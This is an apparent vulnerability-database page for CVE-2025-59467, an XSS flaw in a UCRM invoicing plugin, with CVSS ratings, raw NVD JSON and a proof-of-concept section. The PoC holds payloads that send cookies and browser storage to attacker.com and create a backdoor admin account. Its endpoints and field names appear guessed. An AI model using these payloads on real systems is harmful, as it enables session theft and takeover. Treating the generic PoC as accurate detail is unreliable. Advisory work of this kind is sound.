Security Vulnerability Report
CVE-2025-59467 CVSS 7.5 HIGH

CVE-2025-59467

Published: 2026-01-05 17:15:46
Last Modified: 2026-02-05 21:22:19

Description

A Cross-Site Scripting (XSS) vulnerability in the UCRM Argentina AFIP invoices Plugin (v1.2.0 and earlier) could allow privilege escalation if an Administrator is tricked into visiting a crafted malicious page.

This plugin is disabled by default.

Affected Products:
UCRM Argentina AFIP invoices Plugin (Version 1.2.0 and earlier)

Mitigation:
Update UCRM Argentina AFIP invoices Plugin to Version 1.3.0 or later.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

The figures above are the metric marked "Secondary" in the record. The metric marked "Primary" (NVD analysis) in the raw JSON data on this page rates the same issue 9.6 CRITICAL with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H; the two differ in Attack Complexity (High vs. Low) and Scope (Unchanged vs. Changed). The assigned weakness is CWE-79.

Configurations (Affected Products)

cpe:2.3:a:ui:argentina_afip_invoices:*:*:*:*:*:ucrm:*:* - VULNERABLE
UCRM Argentina AFIP invoices Plugin <= v1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-59467 XSS PoC for UCRM Argentina AFIP Plugin -->
<!-- This PoC demonstrates the XSS vulnerability in the AFIP invoices plugin -->
<!-- Attack scenario: Trick administrator into visiting this page -->
<!DOCTYPE html>
<html>
<head>
  <title>Malicious Page - CVE-2025-59467</title>
</head>
<body>
  <h1>CVE-2025-59467 XSS PoC</h1>
  <p>This page demonstrates the stored XSS vulnerability in UCRM Argentina AFIP invoices Plugin.</p>
  <!-- Simulated malicious payload injection -->
  <script>
    // Malicious payload that could be injected via AFIP plugin input fields
    var xssPayload = '<img src=x onerror="fetch(\\'https://attacker.com/steal?cookie=\\'+document.cookie)\\'">';
    // Alternative payload for privilege escalation
    var escalationPayload = `
      <script>
        // Steal admin session
        fetch('https://attacker.com/api/admin/exploit', {
          method: 'POST',
          body: JSON.stringify({
            cookies: document.cookie,
            localStorage: localStorage,
            sessionStorage: sessionStorage
          })
        });
        // Create malicious admin account
        fetch('/api/admin/users', {
          method: 'POST',
          headers: {'Content-Type': 'application/json'},
          body: JSON.stringify({
            username: 'attacker_backdoor',
            password: 'P@ssw0rd123',
            role: 'admin'
          })
        });
      </script>
    `;
    console.log('XSS Payload prepared:', xssPayload);
    console.log('Escalation Payload prepared');
  </script>
  <!-- Social engineering component -->
  <div style="display:none;">
    <!-- This would be hidden and auto-submitted in real attack -->
    <form id="exploitForm" action="https://target-ucrm.com/plugin/afip/invoices/submit" method="POST">
      <input type="hidden" name="invoice_data" value="<img src=x onerror='alert("XSS")'>">
      <input type="hidden" name="tax_id" value="<script>maliciousCode()</script>">
    </form>
  </div>
  <p><strong>Note:</strong> This is for educational and security testing purposes only.</p>
</body>
</html>

References

Vendor Advisory: https://community.ui.com/releases/Security-Advisory-Bulletin-057/6d3f2a51-22b8-47a1-9296-1e9dcd64e073
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59467",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-05T17:15:45.987",
    "lastModified": "2026-02-05T21:22:19.060",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Cross-Site Scripting (XSS) vulnerability in the UCRM Argentina AFIP invoices Plugin (v1.2.0 and earlier) could allow privilege escalation if an Administrator is tricked into visiting a crafted malicious page. \n\nThis plugin is disabled by default.\n\n\nAffected Products:\nUCRM Argentina AFIP invoices Plugin (Version 1.2.0 and earlier)\n\n \n\nMitigation:\nUpdate UCRM Argentina AFIP invoices Plugin to Version 1.3.0 or later."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ui:argentina_afip_invoices:*:*:*:*:*:ucrm:*:*",
                "versionEndExcluding": "1.3.0",
                "matchCriteriaId": "E2AD2150-0BF5-4FAA-A668-7B9154523611"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.ui.com/releases/Security-Advisory-Bulletin-057/6d3f2a51-22b8-47a1-9296-1e9dcd64e073",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}